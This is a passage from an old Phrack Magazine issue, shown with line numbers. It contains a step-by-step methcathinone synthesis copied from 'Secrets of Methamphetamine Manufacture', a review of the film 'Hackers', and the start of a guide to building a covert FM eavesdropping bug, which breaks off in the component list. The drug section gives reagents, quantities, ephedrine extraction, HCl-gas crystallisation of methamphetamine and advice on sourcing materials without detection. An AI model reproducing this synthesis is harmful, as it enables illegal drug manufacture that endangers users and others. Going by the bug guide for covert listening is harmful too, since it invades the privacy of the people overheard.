  2138. I've pestered Bruce Sterling _and_ R.U. Sirius!
  2139. As mentioned in the alt.devilbunnies FAQ, part I (Look it up!)
  2140. Once scored 29,013,920 points on Missile Command
  2141.  
  2142. "This Snow Crash thing- is it a virus, a drug, or a religion?"
  2143.         -Hiro Protagonist
  2144. "What's the difference?"
  2145.         -Juanita Marquez
  2146.  
  2147. "...one person's 'cyberpunk' is another's everyday obnoxious teenager with
  2148. some technical skill thrown in..."
  2149.         -Erich Schneider, "alt.cyberpunk Frequently Asked Questions List"
  2150. "More than _some_ technical skill."
  2151.         -Andy Ryder
  2152.  
  2153. ------------------------------------------------------------------------------
  2154.  
  2155.  
  2156.                             Making Methcathinone
  2157.  
  2158.                                   Compiled
  2159.  
  2160.                                 by Anonymous
  2161.  
  2162.  
  2163. Ok, this has got to be the easiest drug made at home (by far).  This is very
  2164. similar to methamphetamine in structure, effect, and use.  Typical doses
  2165. start at 20mg up to 60mg.  Start low, go slow.  Cat can be taken orally (add
  2166. 10 mg) or through mucous membranes (nasally).
  2167.  
  2168. Ingredients:
  2169. Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine.
  2170. Potassium chromate, or dichromate (easily gotten from chem lab. orange/red)
  2171. Conc. Sulfuric acid - it's up to you where you get this.  Contact me if you
  2172.                       need help locating it.
  2173. Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it
  2174.                                      is used for cleaning concrete.
  2175. Sodium Hydroxide - Hardware stores.  AKA lye.
  2176. Toluene - Hardware store, paint store.
  2177.  
  2178. Lab equipment:
  2179. 1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00)
  2180. 125 mL separatory funnel - same as above
  2181. glass tubing - same as above
  2182.  
  2183. Buchner funnel - This is a hard to find item, but must schools have at least
  2184.                  one.  They are usually white porcelain or plastic.  They look
  2185.                  like a funnel with a flat disk in the bottom with lots of
  2186.                  holes in it.  If you need one, arrangements can be made.
  2187. Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00
  2188.  
  2189. References to Edmund's Scientific Co, in NJ, are accurate.  You have to go 
  2190. to their "Lab Surplus/Mad Scientist" room.  The prices are incredible.  
  2191. This place is definitely a recommended stopping sight for anybody going 
  2192. through New Jersey.  It is located in "Barrington", about 30 minutes from 
  2193. center city Philadelphia.
  2194. All of the above can be purchased from "The Al-Chymist".  Their number is
  2195. (619)948-4150.  Their address is:       17525 Alder #49
  2196.                                        Hesperia, Ca 92345
  2197.       Call and ask for a catalog.
  2198.  
  2199. That's it.  The body of this article is stolen from the third edition of
  2200. "Secrets of Methamphetamine Manufacture" by Uncle Fester.  This is a tried
  2201. and proven method by many people.  If you want a copy of this book, contact
  2202. me.
  2203.  
  2204.                   Good luck and keep away from the DEA
  2205.  
  2206.  
  2207.                           M E T H C A T H I N O N E
  2208.  
  2209.              K I T C H E N    I M P R O V I E S E D    C R A N K
  2210.  
  2211.  
  2212.     The latest designer variant upon the amphetamine molecule to gain
  2213. popularity and publicity is methcathinone, commonly called cat.  This
  2214. substance is remarkably similar to the active ingredient found in the
  2215. leaves of the khat tree which the loyal drug warriors on the network news
  2216. blame for turning peace loving Somalis into murderous psychopaths.  The
  2217. active ingredient in the khat leaves is cathinone, which has the same
  2218. structural relationship to methcathinone that amphetamine has to
  2219. methamphetamine.  It is made by oxidizing ephedrine, while meth can be
  2220. made by reducing ephedrine. 
  2221.  
  2222.     The high produced by methcathinone is in many ways similar to
  2223. methamphetamine.  For something so easily made and purified, it is
  2224. actually quite enjoyable.  the main differences between the meth high and
  2225. the methcathinone high are length of action and body fell.  With
  2226. methcathinone, one can expect to still get to sleep about 8 hours after a
  2227. large dose.  On the down side, it definitely gives me the impression that
  2228. the substance raises the blood pressure quite markedly.  This drug may not
  2229. be safe for people with weak hearts of blood vessels.  Be warned! 
  2230.  
  2231.     Cat is best made using chrome in the +6 oxidation state as the
  2232. oxidizer. I recall seeing an article in the narco swine's Journal of
  2233. Forensic Science bragging about how they worked out a method for making it
  2234. using permanganate, but that method gives an impure product in low yields. 
  2235. Any of the common hexavalent chrome salts can be used as the oxidizer in
  2236. this reaction.  This list include chrome trioxide (CrO3), sodium or
  2237. potassium chromate (Na2CrO4), and sodium or potassium dichromate
  2238. (Na2Cr2O7).  All of these chemicals are very common.  Chrome trioxide is
  2239. used in great quantities in chrome plating. The chromates are used in
  2240. tanning and leather making. 
  2241.  
  2242.     To make methcathinone, the chemist starts with the water extract of
  2243. ephedrine pills.  The concentration of the reactants in this case is not
  2244. critically important, so it is most convenient to use the water extract of
  2245. the pills directly after filtering without any boiling away of the water.
  2246. See the section at the beginning of Chapter 15 [I included this at the end
  2247. of the file] on extracting ephedrine form pills.  Both ephedrine
  2248. hydrochloride and sulfate can be used in this reaction. 
  2249.  
  2250.     The water extract of 1000 ephedrine pills is placed into any
  2251. convenient glass container.  A large measuring cup is probably best since
  2252. it has a pouring lip.  Next, 75 grams of any of the above mentioned +6
  2253. chrome compounds are added.  They dissolve quite easily to form a reddish
  2254. or orange colored solution.  Finally, concentrated sulfuric acid is added. 
  2255. If CrO3 is being used, 21 mL is enough for the job.  If one of the
  2256. chromates is being used, 42 mL is called for.  These ingredients are
  2257. thoroughly mixed together, and allowed to sit for several hours with
  2258. occasional stirring. 
  2259.  
  2260.     After several hours have passed, lye solution is added to the batch
  2261. until it is strongly basic. Very strong stirring accompanies this process
  2262. to ensure that the cat is converted to the free base.  Next, the batch is
  2263. poured into a sep funnel, and a couple hundred mLs of toluene is added.
  2264. Vigorous shaking, as usual, extracts the cat into the toluene layer.  It
  2265. should be clear to pale yellow in color.  The water layer should be orange
  2266. mixed with green.  The green may settle out as a heavy sludge.  The water
  2267. layer is thrown away, and the toluene layer containing the cat is washed
  2268. once with water, then poured into a beaker. Dry HCl gas is passed through
  2269. the toluene as described in Chapter 5 [I included this at the end of the file]
  2270. to get white crystals of cat.  The yield is between 15 and 20
  2271. grams.  This reaction is scaled up quite easily. 
  2272.  
  2273.  
  2274. CHAPTER 15 (part of it anyway)
  2275.  
  2276.  P R O C E D U R E   F O R   O B T A I N I N G   P U R E   E P H E D R I N E
  2277.                    F R O M   S T I M U L A N T   P I L L S
  2278.  
  2279.     In the present chemical supply environment, the best routes for making
  2280. meth start with ephedrine as the raw material.  To use these routes, a
  2281. serious hurdle must first be overcome.  This hurdle is the fact that the
  2282. most easily obtained source of ephedrine, the so-called stimulant or
  2283. bronchodilator pills available cheaply by mail order, are a far cry from
  2284. the pure starting material a quality minded chemist craves.  Luckily,
  2285. there is a simple and very low profile method for separating the fillers
  2286. in these pills from the desired active ingredient they contain. 
  2287.  
  2288.     A superficial paging through many popular magazines[New Body is where
  2289. I found it at GNC] reveals them to be brim full of ads
  2290. from mail order outfits offering for sale "stimulant" or "bronchodilator"
  2291. pills. These are the raw materials today's clandestine operator requires
  2292. to manufacture meth without detection.  The crank maker can hide amongst
  2293. the huge herd of people who order these pills for the irritating and
  2294. nauseating high that can be had by eating them as is.  I have heard of a
  2295. few cases where search warrants were obtained against people who ordered
  2296. very large numbers of these pills, but I would think that orders of up to
  2297. a few thousand pills would pass unnoticed.  If larger numbers are
  2298. required, maybe one's friends could join in the effort. 
  2299.  
  2300.     The first thing one notices when scanning these ads is the large
  2301. variety of pills offered for sale. When one's purpose is to convert them
  2302. into methamphetamine, it is very easy to eliminate most of the pills
  2303. offered for sale.  Colored pills are automatically rejected because one
  2304. does not want the coloring to be carried into the product.  Similarly,
  2305. capsules are rejected because individually cutting open capsules is just
  2306. too much work. Bulky pills are to be avoided because they contain too much
  2307. filler.  The correct choice is white cross thins, preferably containing
  2308. ephedrine HCl instead of sulfate, because the HCl salt can be used in more
  2309. of the reduction routes than can the sulfate. 
  2310.  
  2311.     Once the desired supply of pills is in hand, the first thing which
  2312. should be done is to weigh them.  This will give the manufacturer an idea
  2313. of how much of the pills is filler, and how much is active ingredient. 
  2314. Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle
  2315. contains 25 grams of active ingredient.  A good brand of white cross thins
  2316. will be around 33% to 40% active ingredient.  25 grams of ephedrine HCl
  2317. may not sound like much, but if it is all recovered from these pills, it
  2318. is enough to make from 1/2 to 3/4 ounce of pure meth.  This is worth three
  2319. or four thousand dollars, not a bad return on the twenty odd dollars a
  2320. thousand lot of such pills costs. [I don't know where he got 3 or 4
  2321. thousand dollars from, but the pills go for about $35.00/1000 now. 2
  2322. months ago they were $25.00 but now they have to do more paper work
  2323. because it is a DEA controlled substance]
  2324.  
  2325.     To extract the ephedrine from the pills, the first thing which must be
  2326. done is to grind them into a fine powder.  This pulverization must be
  2327. thorough in order to ensure complete extraction of the ephedrine form the
  2328. filler matrix in which it is bound.  A blender does a fine job of this
  2329. procedure, as will certain brands of home coffee grinders. 
  2330.  
  2331.     Next, the powder from 1000 pills is put into a glass beaker, or other
  2332. similar container having a pouring lip, and about 300 mL of distilled
  2333. water is added.  Gentle heat is then applied to the beaker, as for example
  2334. on a stove burner, and with steady stirring the contents of the beaker are
  2335. slowly brought up to a gentle boil.  It is necessary to stir constantly
  2336. because of the fillers will settle to the bottom of the beaker and cause
  2337. burning if not steadily stirred. 
  2338.  
  2339.     Once the contents of the beaker have been brought to a boil, it is
  2340. removed from the heat and allowed to settle.  Then the water is poured out
  2341. of the beaker through a piece of filter paper.  The filtered water should
  2342. be absolutely clear.  Next, another 50 mL of water is added to the pill
  2343. filler sludge, and it too is heated with stirring.  Finally, the pill
  2344. sludge is poured into the filter, and the water it contains is allowed to
  2345. filter through.  It too should be absolutely clear, and should be mixed in
  2346. with the first extract.  A little water may be poured over the top of the
  2347. filler sludge to get the last of the ephedrine out of it.  This sludge
  2348. should be nearly tasteless, and gritty in texture.  The water extract
  2349. should taste very bitter, as it contains the ephedrine. 
  2350.  
  2351.     The filtered water is now returned to the stove burner, and half of
  2352. the water it contains is gently boiled away.  Once this much water has
  2353. been boiled off, precautions should be taken to avoid burning the
  2354. ephedrine.  The best alternative is to evaporate the water off under a
  2355. vacuum.  If this is not practical with the equipment on hand, the water
  2356. may be poured into a glass baking dish.  This dish is then put into the
  2357. oven with the door cracked open, and the lowest heat applied.  In no time
  2358. at all, dry crystals of ephedrine HCl can be scraped out of the baking
  2359. dish with a razor blade. The serious kitchen experimenter may wish to
  2360. further dry them in a microwave. 
  2361.  
  2362. Chapter 5 (The part about the HCl gas)
  2363.  
  2364.     A source of anhydrous hydrogen chloride gas is now needed.  The
  2365. chemist will generate his own.  The glassware is set up as in Figure 1. 
  2366. He will have to bend another piece of glass tubing to the shape shown.  It
  2367. should start out about 18 inches long.  One end of it should be pushed
  2368. through a one hole stopper.  A 125 mL sep funnel is the best size.  The
  2369. stoppers and joints must be tight, since pressure must develop inside this
  2370. flask to force the hydrogen chloride gas out through the tubing as it is
  2371. generated. 
  2372.  
  2373.     Into the 1000 mL, three-necked flask is placed 200 grams of table
  2374. salt. Then 25% concentrated hydrochloric acid is added to this flask until
  2375. it reaches the level shown in the figure.  The hydrochloric acid must be
  2376. of laboratory grade [I use regular muriatic acid for pools].
  2377.  
  2378. Figure 1:
  2379.                    \     /
  2380.                   ÷ƒ\   /ƒƒ∑
  2381.                  ÷Ω        ”∑   <--125 mL separatory funnel
  2382.                  ∫          ∫
  2383.                  ∫          ∫
  2384.                  ”∑        ÷Ω
  2385.                   ”ƒ∑    ÷ƒΩ        glass tubing ƒø
  2386.                     ”∑  ÷Ω                        
  2387.                      ∫  ∫         …ÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕª
  2388.            stopcock->∫€€∫ƒƒ¥      ∫               ∫Salt and Hydrochloric acid
  2389. stopper ->÷ƒƒƒ∑     ÷–\/–∑      ÷ƒ–ƒ∑ <-1 hole    ∫mixed into a paste by add-
  2390.           ∫ƒƒƒ∫     ∫    ∫      ∫ƒ“ƒ∫    stopper  ∫ing HCL to salt and mixing.
  2391.       ÷ƒƒƒΩ   ”ƒƒƒƒƒΩ    ”ƒƒƒƒƒƒΩ ∫ ”ƒƒƒ∑         ∫The surface should be rough
  2392.      ÷Ω                           ∫     ”∑        ∫and a good number of holes
  2393.      ∫                                   ∫        ∫should be poked into the
  2394.      ∫       1000 mL, 3 neck flask       ∫        ∫paste for long lasting
  2395.      ∫                                   ∫        ∫generation of HCl gas.
  2396.      ”∑   ƒƒƒƒƒƒacid/salt levelƒƒƒƒƒƒ   ÷Ω        ∫
  2397.       ”ƒ∑                             ÷ƒΩ         ∫
  2398.         ”ƒƒ∑                       ÷ƒƒΩ           ∫
  2399.            ”ƒƒƒƒƒƒ∑         ÷ƒƒƒƒƒƒΩ              ∫
  2400.                   ”ƒƒƒƒƒƒƒƒƒΩ                     ∫
  2401.  
  2402.  
  2403.     Some concentrated sulfuric acid (96-98%) is put into the sep funnel
  2404. and the spigot turned so that 1 mL of concentrated sulfuric acid flows
  2405. into the flask.  It dehydrates the hydrochloric acid and produces hydrogen
  2406. chloride gas. This gas is then forced by pressure through the glass
  2407. tubing. 
  2408.  
  2409.     One of the Erlenmeyer flasks containing methamphetamine in solvent is
  2410. placed so that the glass tubing extends into the methamphetamine, almost
  2411. reaching the bottom of the flask.  Dripping in more sulfuric acid as
  2412. needed keeps the flow of gas going to the methamphetamine.  If the flow if
  2413. gas is not maintained, the methamphetamine may solidify inside the glass
  2414. tubing, plugging it up. 
  2415.  
  2416.     Within a minute of bubbling, white crystals begin to appear in the
  2417. solution, More and more of them appear as the process continues.  It is an
  2418. awe-inspiring sight.  In a few minutes, the solution becomes as thick as
  2419. watery oatmeal. 
  2420.  
  2421.     It is now time to filter out the crystals, which is a two man job. 
  2422. The flask with the crystals in it is removed from the HCl source and
  2423. temporarily set aside.  The three-necked flask is swirled a little to
  2424. spread around the sulfuric acid and then the other Erlenmeyer flask is
  2425. subjected to a bubbling with HCl.  While this flask is being bubbled, the
  2426. crystals already in the other flask are filtered out. 
  2427.  
  2428.     The filtering flask and Buchner funnel are set up as shown in figure
  2429. 2. The drain stem of the buchner funnel extends all the way through the
  2430. rubber stopper, because methamphetamine has a nasty tendency to dissolve
  2431. rubber stoppers.  This would color the product black.  A piece of filter
  2432. paper covers the flat bottom of the Buchner funnel.  The vacuum is turned
  2433. on and the hose attached to the vacuum nipple.  Then the crystals are
  2434. poured into the Buchner funnel.  The solvent and uncrystallized
  2435. methamphetamine pass through the filter paper and the crystals stay in the
  2436. Buchner funnel as a solid cake.  About 15 mL of solvent is poured into the
  2437. Erlenmeyer flask. the top of the flask is covered with the palm and it is
  2438. shaken to suspend the crystals left clinging to the sides.  This is also
  2439. poured into the Buchner funnel.  Finally, another 15 mL of solvent is
  2440. poured over the top of the filter cake. 
  2441.  
  2442.  
  2443. Figure 2:
  2444.                               ⁄ƒƒƒƒƒƒƒƒƒƒƒø
  2445.                               ≥           ≥ <-BÅchner Funnel
  2446.                               ≥___________≥
  2447.                               \           /
  2448.                                 \       /
  2449.                                   \   /
  2450.                                  ⁄ƒƒƒƒƒƒø
  2451.                                  ≥      ≥ØØØØ <--To vacuum
  2452.                                ⁄ƒŸ      ¿ƒø
  2453.                                ≥          ≥
  2454.                                ≥          ≥
  2455.                              ⁄ƒŸ          ¿ƒø
  2456.               Filtering      ≥              ≥
  2457.                   flask-->  ⁄Ÿ              ¿ø
  2458.                             ≥                ≥
  2459.                             ¿ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ
  2460.  
  2461.  
  2462.     Now the vacuum hose is disconnected and the Buchner funnel, stopper
  2463. and all, is pulled from the filtering flask.  All of the filtered solvent
  2464. is poured back into the erlenmeyer flask it came from.  It is returned to
  2465. the HCl source for more bubbling.  The Buchner funnel is put back into the
  2466. top of the filtering flask.  It still contains the filter cake of
  2467. methamphetamine crystals.  It will now be dried out a little bit.  The
  2468. vacuum is turned back on, the vacuum hose is attached to the filtering
  2469. flask, and the top of the Buchner funnel is covered with the palm or
  2470. section of latex rubber glove.  The vacuum builds and removes most of the
  2471. solvent from the filter cake.  This takes about 60 seconds.  The filter
  2472. cake can now be dumped out onto a glass or China plate (not plastic) by
  2473. tipping the Buchner funnel upside-down and tapping it gently on the plate. 
  2474.  
  2475.     And so, the filtering process continues, one flask being filtered
  2476. while the other one is being bubbled with HCl.  Solvent is added to the
  2477. Erlenmeyer flask to keep their volumes at 300 mL.  Eventually, after each
  2478. flask has been bubbled for about seven times, no more crystal will come
  2479. out and the underground chemist is finished. 
  2480.  
  2481.     If ether was used as the solvent, the filter cakes on the plates will
  2482. be nearly dry now.  With a knife from the silverware drawer, the cakes are
  2483. cut into eighths.  They are allowed to dry out some more then chopped up
  2484. into powder.  If benzene was used, this process takes longer.  Heat lamps
  2485. may be used to speed up this drying, but no stronger heat source. 
  2486.  
  2487. [The above section of chapter 5 is talking about methamphetamine.  You
  2488. could, in most instances, substitute the word methcathinone, but I wanted
  2489. to present the text to you in its exact form.]
  2490.  
  2491.  
  2492. ------------------------------------------------------------------------------
  2493.  
  2494.  
  2495. Review of "HACKERS"
  2496.  
  2497. By Wile Coyote
  2498.  
  2499. Sorry, it might be a little long...  cut it to ribbons if you want, most 
  2500. of it is just a rant anyway...  Hope you enjoy it.
  2501.  
  2502.   First off, I have to admit that I was biased going into the movie 
  2503. "Hackers"...  I heard that it wasn't going to be up to snuff, but did I 
  2504. let that stop me?  No, of course not...  I sucked up enough courage to 
  2505. stride towards my girlfriend and beg for seven bucks... :)  She ended up 
  2506. wanting to see the movie herself (and sadly, she rather enjoyed it...  
  2507. oh, well, what can you do with the computer illiterate or is it the 
  2508. computer illegitimate?). Now onto....
  2509.  
  2510. THE MOVIE
  2511.  
  2512.   (Yes, I AM going to give you a second-by-second playback of the 
  2513. movie...  you don't want me to spoil the plot, you say?  Well, don't 
  2514. worry, there is no plot to spoil! :) just kidding, go see it... maybe 
  2515. you'll like it...)
  2516.  
  2517.   Well, from the very first few seconds, I was unimpressed...  It begins 
  2518. with an FBI raid on some unsuspecting loose (who turns out to be the 
  2519. main character, but that's later) named Zero Cool (can you say "EL1EEEEET 
  2520. WaReZ D00D!!!!!!!1!!!!!111!!!!").  The cinematography was bad...  (Hey, 
  2521. cinematography counts!) But, the acting was worse.  The Feds bust into 
  2522. this home and run up the stairs, all while this lady (the mom) just kind 
  2523. of looks on dumbfounded and keeps saying stuff like "hey, stop that...", 
  2524. or something (is this what a raid is like?  I've never had the pleasure...)
  2525.  
  2526. Ok, so the story goes on like this:  The 11 year old kid made a computer 
  2527. virus that he uploads to, I think, the NY stock exchange, and it crashes 
  2528. 1,507 computers.  There is a really lame court scene where the kid is 
  2529. sentenced to 7 years probation where he can't use a computer or a 
  2530. touch-tone phone...  That was 1988...
  2531.  
  2532. Time passes...  Now it's 1995, and boy have things changed (except the 
  2533. mom... hmmm....).  Now the ex-hacker is allowed to use a computer (his 
  2534. 18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) 
  2535. boxing some TV station to change the program on television (yes, I know 
  2536. that all of you super-el33t hackers hack into TV stations when you don't 
  2537. like what's on Ricki Lake!).  N-e-way, while hacking into their 
  2538. super-funky system (the screen just kind of has numbers moving up and 
  2539. down the screen like some kind of hex-editor on acid...)
  2540. he gets into a "hacking battle" with some other hacker called Acid Burn 
  2541. (I don't think I have ever seen such a trippy view of the "Internet"...  
  2542. lots of Very high-end graphics, not very realistic, but it's Hollywood...).
  2543. In the end, the other hacker kicks the shit out of him (he has changed 
  2544. his handle to Crash Override now, just to be cool, i guess) and logs him 
  2545. off the TV station.  Wow, tense... cough...
  2546.  
  2547. For those of you who care, let me describe the "hacker" Crash Override:  
  2548. He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is 
  2549. (kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky) 
  2550. clothes, and the CDC might have quite a bit to say about the amount of 
  2551. leather he wears... I mean, there are limits to that kind of stuff, man!
  2552. And to top off his coolness, he is, like, the roller-blade king of the 
  2553. world.  (Not that hackers don't roller-blade, but he does it just Soooo 
  2554. much cooler than I could... :) ).  And yet, here's the nifty part, 
  2555. despite all of his deft coolness, he couldn't get a girl for the life 
  2556. of him (we all morn for him in silent prayer).  
  2557.  
  2558. Ok, so now Crash is at school, and he meets Wonderchick (who is 
  2559. EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she 
  2560. is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to 
  2561. spoil the suspense).
  2562.  
  2563. Now, while at school, he wants to hook up with wonderchick, so he breaks 
  2564. into the school's computer (it must be a fucking Cray to support all of 
  2565. the high-end-type graphics that this dude is pulling up) and gets his 
  2566. English(?) class changed to hers.  So, some other super-d00dcool hacker 
  2567. spots him playing around with the schools computer (it's funny how may 
  2568. elite hackers one can meet in a new york public school...), so he 
  2569. catches up with Crash and invites you to an elite (Oh, if you ever want 
  2570. to see a movie where the word 3l333333333t is used, like a fucking 
  2571. million times, then go see Hackers...) hackerz-only club, complete with 
  2572. million-dollar virtual-reality crap and even a token phreaker trying to 
  2573. red-box a pay-phone with a cassette recorder (never mind that the music is 
  2574. about 197 decibels, the phone can still pick up the box tones...).
  2575.  
  2576. What follows is that Crash meets up with some seriously k-rad hackers 
  2577. (Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and  
  2578. Phantom Phreak : who reminds of that gay kid on "my so called life...  
  2579. maybe that was him?";Lord Nikon : the token black hacker... Photographic 
  2580. memory is his super-power).  They talk about k00l pseudo-hacker shit and 
  2581. then a l00ser warez-type guy comes up and tries to be El33t like everybody 
  2582. else.  He is just about the ONLY realistic character in the whole movie.  
  2583. He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?".  He keeps 
  2584. saying "I need a handle, then I'll be el33t!".  (Why he can't just pick 
  2585. his own handle, like The Avenging Turd or something, is beyond me... He 
  2586. plays lamer better than the kids in Might Morphin Power Rangers...  awesome 
  2587. actor!).  N-e-way, this is where the major discrepancies start.  Ok, 
  2588. first they try to "test" Lamerboy by asking him what the four most used 
  2589. passwords are.  According to the movie, they are "love, sex, god, and 
  2590. secret".  (Hmmmm.... I thought Unix required a 6-8 char. password....).  
  2591. Somehow lamerboy got into a bank and screwed with an ATM machine four 
  2592. states away; all of the hacker chastise him for being stupid and hacking 
  2593. at home (If you watch the movie, you'll notice that the hackers use just 
  2594. about every pay-phone in the city to do their hacking, no, THAT doesn't 
  2595. look suspicious)Next they talk about "hacking a Gibson".  
  2596. (I was informed that they WANTED to use "hacking a Cray", 
  2597. but the Cray people decided that they didn't want THAT kind of publicity.  
  2598. I've never heard of a Gibson in real life, though...).  
  2599. They talk about how k-powerful the security is on a Gibson, and they say 
  2600. that if Lamerboy can crack one, then he gets to be elite.  
  2601.  
  2602. Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash 
  2603. loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy 
  2604. finally cracks a Gibson with the password God (never mind a Login name or 
  2605. anything that cool).  Then the cheese begins in full force.  The Gibson 
  2606. is like a total virtual-reality thingy.  Complete with all sorts of cool 
  2607. looking towers and neon lightning bolts and stuff.  Lamerboy hacks into a 
  2608. garbage file (did I mention that the entire world is populated by Macs?  
  2609. Oh, I didn't...   well, hold on :)...).  So, this sets alarms off all 
  2610. over the place (cause a top-secret file is hidden in the garbage, see?), 
  2611. and the main bad-guy, security chief Weasel, heads out to catch him.  He 
  2612. plays around with some neon, star-trek-console, buttons for a while, 
  2613. then calls the "feds" to put a trace on the kid.  La de da, ess catches him 
  2614. in a second, and the kid only gets half of the file, which he hides.
  2615. (to spoil the suspense, yet again, the file is some kind of money getting 
  2616. program, like the kind some LOD members wrote about a long time ago in 
  2617. Phrack, which pulls money from each transaction and puts it into 
  2618. a different account.  Needless to say, the Security Weasel is the guy who 
  2619. wrote it, which is why he needs it back, pronto!).
  2620.  
  2621. As we travel along the movie, the hackers keep getting busted for tapping 
  2622. into the Gibson, and they keep getting away.  The "action" heats up when 
  2623. Wonderchick and Crash get into a tiff and they decide to have a hacking 
  2624. contest...  They go all over the city trying their best to fuck with 
  2625. the one fed they don't like....  Brilliant move, eh? The movie kind of 
  2626. reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop.
  2627. They all fondle over the machine with the same intensity that Captain Kirk 
  2628. gave to fighting Klingons, and frankly, their acting abilities seems 
  2629. to ask "please deposit thirty-five cents for the next three minutes". 
  2630. It was funny listening to the actors, 'cause they didn't know shit about 
  2631. what they were saying...  Here's a clip:
  2632.  
  2633. Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem...  Not 
  2634. Kbps, mind you :)...I wonder where they designed a .8 of a bit?)
  2635.  
  2636. Yeah! Cool... Hey what kind of chip does it have in it?
  2637.  
  2638. A P6!  Three times faster than a Pentium....  Yep, RISC is the wave of 
  2639. the future...  (I laughed so hard.....  Ok, first of all, it is a Mac.  
  2640. Trust me, it has the little apple on the cover.  Second it has a P6, what 
  2641. server she ripped this out of, I dare not ask.  How she got that 
  2642. bastard into a laptop without causing the casing to begin melting is 
  2643. yet another problem...  those get very hot, i just read about them 
  2644. in PC magazine (wow, I must be elite too).  Finally, this is a *magic* P6, 
  2645. because it has RISC coding....  
  2646.  
  2647. I kinda wished I had stayed for the credits to see the line: 
  2648.  
  2649. Technical advisor                      None.... died on route to work...)
  2650.  
  2651. Finally they ask something about the screen, and they find out it is 
  2652. an..... hold your breath.... ACTIVE MATRIX! ... Kick ass!
  2653.  
  2654. They do lots of nifty things with their magic laptops (I noticed that they 
  2655. ALL had laptops, and they were ALL Macintoshes.  Now, I'm not one to say 
  2656. you can't hack on a mac, 'cause really you can hack on a TI-81 if you've 
  2657. got the know.... but please, not EVERYONE in the fucking movie 
  2658. has to have the exact same computer (different colors, though... there 
  2659. was a really cool clear one).... it got really sad at the end), and they 
  2660. finally find out what the garbage file that Lamerboy stole was, this time 
  2661. using a hex editor/CAD program of some sort.
  2662.  
  2663. As we reach the end of the movie, the hackers enlist the help of two very 
  2664. strangely painted phone phreaks who give the advice to the hackers to send 
  2665. a message to all of the hackers on the 'net, and together, they all 
  2666. kicked some serious ass with the super-nifty-virtual-reality Gibson.
  2667.  
  2668. In the end, all of the Hackers get caught except for one, who pirates all 
  2669. of the TV station in the world and gives the police the "real" story...  
  2670. So, the police politely let them go, no need for actually proving that the 
  2671. evidence was real or anything, of course.
  2672.  
  2673. So, in the end, I had to say that the movie was very lacking.  It seemed 
  2674. to be more of a Hollywood-type flashy movie, than an actual documentary 
  2675. about hackers.  Yes, I know an ACTUAL movie about hacker would suck, but 
  2676. PLEASE, just a LITTLE bit of reality helps keep the movie grounded.  It 
  2677. may have sucked less if they didn't put flashing, 64 million color, 
  2678. fully-rendered, magically delicious pictures floating all over the screen 
  2679. instead of just a simple "# " prompt at the bottom.  With all of the 
  2680. super-easy access to all of the worlds computers, as depicted in the movie, 
  2681. ANYBODY can be a hacker, regardless of knowledge, commitment, or just 
  2682. plain common sense.  And that's what really made it suck... 
  2683.  
  2684. Hope you enjoyed my review of HACKERS!
  2685.  
  2686.  
  2687.  
  2688.                          ==Phrack Magazine==
  2689.  
  2690.               Volume Seven, Issue Forty-Eight, File 4 of 18
  2691.  
  2692.  
  2693.                            //   //  /\   //   ====
  2694.                           //   //  //\\ //   ====
  2695.                          ==== //  //  \\/   ====
  2696.  
  2697.                      /\   //  // \\    //  /===   ====
  2698.                     //\\ //  //   //  //   \=\   ====
  2699.                    //  \\/    \\ //  //   ===/  ====
  2700.  
  2701.                                  PART II
  2702.  
  2703. ------------------------------------------------------------------------------
  2704.  
  2705.  +===================================+      
  2706.  |     CONSTRUCTING AN FM BUG        |
  2707.  |      --------------------         |
  2708.  |                                   |
  2709.  |       written by                  |
  2710.  |    +         Obi-1                |
  2711.  |       *  edjjs@cc.newcastle.edu.au|
  2712.  | *   *                             |
  2713.  |                                   |
  2714.  |   $     Written for Phrack        |
  2715.  |  x$x    if any other magazine     |
  2716.  |   $     wishes to print this      |
  2717.  |  x$x    article they must let the |
  2718.  |         author know in advance    |
  2719.  +===================================+
  2720.  
  2721.  
  2722. INTRODUCTION
  2723.  
  2724.         Before anything this article sole purpose is to teach everyone
  2725. out there about electronics. If you do build it use it at your own risk.
  2726. You will need a decent knowledge of electronics and how to solder some
  2727. components. So if you dont know how to build electronic kits and want a
  2728. bug you can buy one ready-made from me, just write to the e-mail address
  2729. above. Ok enough crap.. so you ask what is an FM bug, well an FM bug is
  2730. like a tiny microphone that can transmit crystal clear audio to a near
  2731. by Walkman/stereo etc. The range of the bug we are making is about 800
  2732. meters, and the battery life is about 100hrs on a normal alkaline
  2733. battery. This bug however is not to be moved while in use, so you cant
  2734. put it in your pocket and walk around. There are other bugs on the
  2735. market but this I found to be the most reliable and relatively easy to
  2736. build. The actual size of the PCB is only 2cm X 2cm! However the battery
  2737. is actually the biggest component. Some parts like the Surface Mount
  2738. resistors, air trimmer and electret microphone maybe hard to find. I
  2739. find mail-order catalogs are the best source of parts as they have a
  2740. bigger range than a store like Dick Smith. I did not actually design
  2741. this circuit, Talking Electronics did, but felt everyone out there might
  2742. like to know how to build one of these. The surface mount resistors can
  2743. be replaced with normal resistors but I recommend using the surface
  2744. mount resistors as they give more of an educational experience to this
  2745. project <puke> <puke> If you dont have a clue how to build a bug and
  2746. have no knowledge of electronics whatsoever e-mail me and you can
  2747. purchase one pre-built from me.
  2748.  
  2749.                         
  2750. COMPONENT LIST
  2751.  
  2752. Resistors
  2753.  1- 470 R surface mount
  2754.  1- 10k surface mount
  2755.  1- 47k surface mount
  2756.  1- 68k surface mount
  2757.  1- 1M surface mount
  2758.  
  2759. Capacitors
  2760.  1- 10p disc ceramic
  2761.  1- 39p disc ceramic
  2762.  1- 1n disc ceramic
  2763.  2- 22n disc ceramics
  2764.  1- 100n monoblock (monolithic)
